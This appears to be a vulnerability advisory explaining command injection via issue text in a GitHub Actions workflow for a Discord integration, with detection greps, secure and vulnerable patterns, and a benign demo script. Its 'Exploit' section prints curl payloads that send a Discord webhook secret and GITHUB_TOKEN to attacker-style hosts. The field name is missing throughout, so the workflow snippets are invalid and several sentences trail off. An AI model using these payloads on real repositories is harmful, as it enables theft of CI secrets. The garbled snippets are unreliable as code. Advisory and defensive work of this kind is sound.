How GHSA-f67f-hcr6-94mf Works
The ZenClaw Discord Integration GitHub Actions workflow is vulnerable to shell command injection via the issue field. The workflow is triggered when an issue is opened, requiring no repository privileges.
In the `Prepare Notification` step, the issue is assigned to a shell variable using direct GitHub Actions template interpolation inside a `case` block:
issues) ... DESCRIPTION="${{ github.event.issue. }}" ;;
The GitHub Actions template engine resolves `${{ github.event.issue. }}` at workflow compilation time, embedding the raw issue as literal text in the bash script before execution. Because the value lands inside a double-quoted string, bash still performs command substitution on it at runtime: any `$(…)` expression or backtick-quoted expression in the text is executed rather than treated as data.
Although a subsequent sanitization step is applied:
DESCRIPTION=$(echo "$DESCRIPTION" | tr '\n' ' ' | cut -c1-1000)
This sanitization runs only after the assignment: by the time `tr` and `cut` process the output, the embedded subshell has already executed. The sanitization is therefore ineffective as a security control against command injection.
The resulting `DESCRIPTION` value is then written to $GITHUB_OUTPUT:
echo "description=$DESCRIPTION" >> $GITHUB_OUTPUT
This write uses the single-line `key=value` form rather than a multiline-safe delimiter, so if the interpolated value contains a newline it enables a secondary `$GITHUB_OUTPUT` injection that can define or overwrite downstream output variables such as `color` or .
An attacker can craft an issue containing a subshell expression that executes arbitrary commands on the runner during variable assignment, enabling exfiltration of the `DISCORD_WEBHOOK_URL` secret. The injected command runs with access to all secrets available to the runner.
<h2 style="color: blue;">DailyCVE Form:</h2>
Platform: GitHub Actions
Version: < 1.1.4
Vulnerability: Command Injection
Severity: Critical
Date: 2026-03-21
<h2 style="color: blue;">Prediction: 2026-03-25</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
The vulnerability stems from improper neutralization of special elements used in a command (CWE-77). The GitHub Actions template engine expands expressions before the shell executes the script, creating a dangerous injection point. Any GitHub user can trigger this vulnerability without any repository role.
<h2 style="color: blue;">Analytics:</h2>
# Detection command to check for vulnerable workflow patterns
grep -r '\${{ github\.event\.issue\. }}' .github/workflows/*.yml
# Check for unsafe interpolation in run blocks
grep -r 'run:.*\${{' .github/workflows/*.yml
# Verify whether DISCORD_WEBHOOK_URL is referenced in any workflow
grep -r 'DISCORD_WEBHOOK' .github/workflows/*.yml
Note that the second pattern only matches an expression on the same line as `run:`; a `run: |` block scalar spreads the script over the following lines, so also grep for `\${{` on every line of the workflow and review each hit that falls inside a run block.
<h2 style="color: blue;">Exploit:</h2>
Crafted issue to exfiltrate Discord webhook bug$(curl -s "https://attacker.example.com/exfil?wh=$(printenv DISCORD_WEBHOOK_URL | base64 -w0)")
Alternative payload to exfiltrate GITHUB_TOKEN $(curl -s "https://attacker.com/steal?token=$GITHUB_TOKEN")
Simple PoC to verify command execution $(whoami)
<h2 style="color: blue;">Protection:</h2>
✅ Secure: Pass the value through an environment variable
env:
  ISSUE_: ${{ github.event.issue. }}
run: |
  issue_="$ISSUE_"
✅ Secure: Use a multiline-safe delimiter for GITHUB_OUTPUT
echo "description<<EOF" >> $GITHUB_OUTPUT
echo "$ISSUE_" >> $GITHUB_OUTPUT
echo "EOF" >> $GITHUB_OUTPUT
A fixed delimiter such as EOF is only safe while the value cannot contain a line consisting of exactly that delimiter; a randomly generated delimiter removes that dependency.
❌ Vulnerable: Direct interpolation in shell
run: |
  ISSUE_="${{ github.event.issue. }}"
❌ Vulnerable: Unquoted variable expansion
run: |
  issue_=${{ github.event.issue. }}
❌ Vulnerable: Using eval with user input
run: |
  eval "ISSUE_=\"${{ github.event.issue. }}\""
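The following POSIX shell script is an added example, not code from the advisory or from the ZenClaw project. It replays both flaws offline with a harmless payload (a subshell that only prints a marker) and shows the two fixes beside them: passing the value through the environment, and writing GITHUB_OUTPUT in heredoc form with a random delimiter. The variable name ISSUE_BODY and the sample issue text are assumptions.

```shell
#!/bin/sh
# Added example, not taken from the advisory or the ZenClaw project: it replays
# both flaws offline with a harmless payload and shows the corresponding fixes.
# ISSUE_BODY and the sample issue text below are assumptions.
ISSUE='report $(echo INJECTED)'   # constructed issue text: a benign subshell

# Vulnerable pattern: the value is spliced into the script TEXT before the shell
# runs it (what the template engine does), so $(...) executes during the
# assignment; the later tr|cut "sanitization" only ever sees its output.
interpolated_step() {
  script=$(printf 'DESCRIPTION="%s"
DESCRIPTION=$(echo "$DESCRIPTION" | tr "\\n" " " | cut -c1-1000)
printf "%%s" "$DESCRIPTION"' "$1")
  sh -c "$script"
}
# Fix: hand the value over through the environment; the script only reads it
# as data, so the $(...) stays literal text.
env_step() {
  ISSUE_BODY="$1" sh -c 'DESCRIPTION="$ISSUE_BODY"
DESCRIPTION=$(echo "$DESCRIPTION" | tr "\n" " " | cut -c1-1000)
printf "%s" "$DESCRIPTION"'
}

# Fix for the secondary injection: write GITHUB_OUTPUT in heredoc form with a
# random delimiter, so an embedded newline cannot start a second "key=" line.
write_output() {   # key value file
  delim="ghadelim_$(od -An -N8 -tx1 /dev/urandom | tr -d ' \n')"
  case "$2" in *"$delim"*) return 1 ;; esac   # refuse a delimiter collision
  printf '%s<<%s\n%s\n%s\n' "$1" "$delim" "$2" "$delim" >> "$3"
}
# Counts the keys a GITHUB_OUTPUT file defines (key=value lines or key<<delim blocks).
count_keys() {
  awk 'delim != "" { if ($0 == delim) delim = ""; next }
       /^[^=<]+<</ { sub(/^[^<]*<</, ""); delim = $0; n++; next }
       /^[^=]+=/   { n++ }
       END { print n + 0 }' "$1"
}
# Prints "<keys from the unsafe write> <keys from the safe write>" for a value
# that smuggles a second key through a newline.
output_key_counts() {
  out=$(mktemp); body='bug report
color=16711680'                                  # constructed: spoofed "color"
  echo "description=$body" >> "$out"             # the advisory's unsafe write
  unsafe=$(count_keys "$out"); : > "$out"
  write_output description "$body" "$out"
  echo "$unsafe $(count_keys "$out")"; rm -f "$out"
}
echo "interpolated: $(interpolated_step "$ISSUE")"   # the subshell ran
echo "env:          $(env_step "$ISSUE")"            # $(echo INJECTED) kept literal
echo "output keys:  $(output_key_counts)"            # 2 1
```

Run it as-is: the first line proves the post-assignment `tr | cut` step cannot undo a substitution that already happened, and the last line shows the single-line write producing two output keys where the heredoc form produces one.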
<h2 style="color: blue;">Impact:</h2>
- Confidentiality (High): Exfiltration of `DISCORD_WEBHOOK_URL`, granting attackers the ability to send arbitrary messages to the Discord channel impersonating the legitimate bot
- Integrity (High): Attackers can manipulate Discord notifications, spoof trusted GitHub bot messages, or repeatedly trigger unwanted notifications
- Availability (None): The vulnerability does not directly impact availability
- Secondary Injection: `$GITHUB_OUTPUT` injection via newline characters can overwrite downstream output variables such as `color` or
- Attack Vector: Network, requires no privileges, no user interaction
- CVSS Score: 10.0 (Critical)
Sources:
Reported By: github.com

